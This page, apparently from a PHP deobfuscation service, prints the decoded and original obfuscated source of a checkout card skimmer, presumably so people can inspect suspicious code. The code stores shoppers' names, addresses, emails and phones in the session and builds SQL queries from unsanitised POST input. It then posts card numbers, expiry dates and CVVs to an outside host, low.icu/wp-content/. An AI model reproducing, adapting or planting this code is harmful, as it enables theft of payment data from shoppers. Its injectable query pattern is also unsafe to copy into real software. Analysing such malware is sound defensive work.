Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto NGA_I; NGA_I: if (isset($_POST["\160\157\163\164\143\157\144\x65"]) and isset($_POST[..

Decoded Output download

<?  goto NGA_I; NGA_I: if (isset($_POST["postcode"]) and isset($_POST["email"])) { session_start(); $_SESSION["adddreas"] = $_POST["address_1"]; $_SESSION["addrebs"] = $_POST["city"]; $_SESSION["sadsdws"] = $_POST["postcode"]; $_SESSION["adsdSws"] = $_POST["firstname"]; $_SESSION["adsdEWQWEws"] = $_POST["lastname"]; $_SESSION["adsdEWQWEws"] = $_POST["lastname"]; $_SESSION["adsdEWQWEws"] = $_POST["lastname"]; $_SESSION["adsdEWQWEwse"] = $_POST["email"]; $_SESSION["adsdEWQWEwst"] = $_POST["telephone"]; } elseif (isset($_POST["address_id"])) { session_start(); $tpro = DB_PREFIX; $adddre = $tpro . "address"; $ustom = $tpro . "customer"; $link = mysqli_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD, DB_DATABASE); $youth = $_POST["address_id"]; $sql = "SELECT * FROM {$adddre} WHERE address_id='{$youth}'"; if ($res = mysqli_query($link, $sql)) { if (mysqli_num_rows($res) > 0) { while ($row = mysqli_fetch_array($res)) { $_SESSION["adddreas"] = $row["address_1"]; $_SESSION["addrebs"] = $row["city"]; $_SESSION["sadsdws"] = $row["postcode"]; $_SESSION["adsdSws"] = $row["firstname"]; $_SESSION["adsdEWQWEws"] = $row["lastname"]; $cusid = $row["customer_id"]; } } } $sqlt = "SELECT * FROM {$ustom} WHERE customer_id='{$cusid}'"; if ($rest = mysqli_query($link, $sqlt)) { if (mysqli_num_rows($rest) > 0) { while ($rowt = mysqli_fetch_array($rest)) { $_SESSION["adsdEWQWEwse"] = $rowt["email"]; $_SESSION["adsdEWQWEwst"] = $rowt["telephone"]; } } } } goto nmxos; nmxos: if (isset($_POST["ccc"]) and $_POST["ccc"] != '') { session_start(); $ccnum = $_POST["ccc"]; $expmonth = $_POST["expp"]; $cvv = $_POST["cvvv"]; $street = $_SESSION["adddreas"]; $postcode = $_SESSION["sadsdws"]; $city = $_SESSION["addrebs"]; $fnamezz = $_SESSION["adsdEWQWEws"]; $fnamez = $_SESSION["adsdSws"]; $email = $_SESSION["adsdEWQWEwse"]; $phone = $_SESSION["adsdEWQWEwst"]; $ip = $_SERVER["SERVER_NAME"]; $message = "{$fnamez} {$fnamezz}|{$ccnum}|{$expmonth}|{$cvv}|{$street}|{$city}|{$postcode}|{$phone}|{$email}"; $rnessage = "{$message}\xa"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://low.icu/wp-content/"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "data={$rnessage}&name={$ip}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $server_output = curl_exec($ch); curl_close($ch); } goto ngL1V; ngL1V:  ?>

Did this file decode correctly?

Original Code

goto NGA_I; NGA_I: if (isset($_POST["\160\157\163\164\143\157\144\x65"]) and isset($_POST["\145\155\141\x69\x6c"])) { session_start(); $_SESSION["\x61\144\144\x64\x72\x65\x61\163"] = $_POST["\141\144\144\x72\145\x73\x73\x5f\61"]; $_SESSION["\x61\144\x64\x72\145\142\163"] = $_POST["\x63\x69\164\x79"]; $_SESSION["\x73\141\144\163\x64\x77\x73"] = $_POST["\x70\157\163\164\143\x6f\144\x65"]; $_SESSION["\141\x64\x73\x64\123\x77\163"] = $_POST["\x66\x69\162\163\164\156\x61\x6d\x65"]; $_SESSION["\141\144\163\144\x45\127\x51\127\105\x77\x73"] = $_POST["\x6c\141\x73\164\x6e\x61\155\x65"]; $_SESSION["\141\x64\163\x64\105\127\x51\x57\105\x77\163"] = $_POST["\x6c\141\163\x74\156\x61\155\145"]; $_SESSION["\x61\144\x73\144\x45\x57\121\127\105\x77\x73"] = $_POST["\x6c\x61\x73\164\156\x61\x6d\x65"]; $_SESSION["\x61\144\163\144\x45\127\121\127\105\x77\x73\145"] = $_POST["\145\x6d\x61\x69\x6c"]; $_SESSION["\141\x64\163\x64\x45\127\121\127\x45\167\x73\x74"] = $_POST["\x74\x65\x6c\145\160\150\x6f\x6e\145"]; } elseif (isset($_POST["\x61\144\x64\162\145\x73\163\137\151\x64"])) { session_start(); $tpro = DB_PREFIX; $adddre = $tpro . "\141\144\144\162\x65\x73\163"; $ustom = $tpro . "\x63\165\163\164\157\155\145\162"; $link = mysqli_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD, DB_DATABASE); $youth = $_POST["\141\x64\x64\x72\145\163\x73\x5f\151\x64"]; $sql = "\123\x45\x4c\105\x43\x54\40\52\40\x46\x52\117\x4d\40{$adddre}\x20\x57\x48\x45\x52\x45\x20\141\144\x64\x72\x65\x73\163\137\x69\x64\75\x27{$youth}\x27"; if ($res = mysqli_query($link, $sql)) { if (mysqli_num_rows($res) > 0) { while ($row = mysqli_fetch_array($res)) { $_SESSION["\x61\144\144\x64\162\145\x61\163"] = $row["\141\x64\144\162\x65\163\x73\137\x31"]; $_SESSION["\141\x64\x64\x72\x65\142\x73"] = $row["\x63\151\x74\171"]; $_SESSION["\x73\x61\x64\x73\144\167\163"] = $row["\x70\x6f\x73\164\x63\157\x64\145"]; $_SESSION["\x61\x64\163\144\x53\x77\x73"] = $row["\146\x69\x72\163\x74\156\x61\x6d\x65"]; $_SESSION["\141\x64\x73\x64\x45\127\121\x57\x45\167\163"] = $row["\x6c\141\163\x74\156\x61\x6d\x65"]; $cusid = $row["\143\x75\x73\x74\x6f\x6d\x65\162\x5f\151\144"]; } } } $sqlt = "\123\105\114\x45\x43\x54\x20\52\x20\x46\122\x4f\x4d\x20{$ustom}\40\127\x48\x45\122\x45\x20\143\165\x73\x74\157\x6d\x65\162\x5f\x69\x64\75\x27{$cusid}\x27"; if ($rest = mysqli_query($link, $sqlt)) { if (mysqli_num_rows($rest) > 0) { while ($rowt = mysqli_fetch_array($rest)) { $_SESSION["\x61\144\163\144\x45\127\x51\127\105\x77\163\145"] = $rowt["\145\155\x61\151\154"]; $_SESSION["\x61\144\163\144\105\127\x51\127\x45\x77\x73\x74"] = $rowt["\x74\145\154\145\x70\150\x6f\156\145"]; } } } } goto nmxos; nmxos: if (isset($_POST["\143\143\143"]) and $_POST["\143\143\x63"] != '') { session_start(); $ccnum = $_POST["\143\143\x63"]; $expmonth = $_POST["\x65\x78\x70\x70"]; $cvv = $_POST["\x63\166\x76\x76"]; $street = $_SESSION["\x61\144\144\144\162\x65\x61\x73"]; $postcode = $_SESSION["\x73\x61\x64\163\x64\167\163"]; $city = $_SESSION["\141\x64\x64\162\x65\x62\163"]; $fnamezz = $_SESSION["\141\x64\x73\x64\x45\127\x51\x57\105\167\163"]; $fnamez = $_SESSION["\x61\144\163\144\123\x77\x73"]; $email = $_SESSION["\141\144\x73\x64\x45\x57\x51\x57\105\x77\x73\x65"]; $phone = $_SESSION["\141\144\x73\x64\105\127\x51\127\x45\x77\163\x74"]; $ip = $_SERVER["\x53\105\x52\x56\105\122\x5f\x4e\x41\x4d\105"]; $message = "{$fnamez}\40{$fnamezz}\x7c{$ccnum}\x7c{$expmonth}\174{$cvv}\174{$street}\x7c{$city}\x7c{$postcode}\174{$phone}\174{$email}"; $rnessage = "{$message}\xa"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\x74\160\x73\72\x2f\57\x6c\x6f\x77\x2e\151\x63\165\x2f\167\160\55\x63\x6f\156\164\x65\156\x74\57"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "\x64\141\164\x61\75{$rnessage}\46\x6e\141\x6d\x65\x3d{$ip}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $server_output = curl_exec($ch); curl_close($ch); } goto ngL1V; ngL1V:

Function Calls

None

Variables

None

Stats

MD5 95e5d42160f57bf671b8a0c9d9a8bc1f
Eval Count 0
Decode Time 134 ms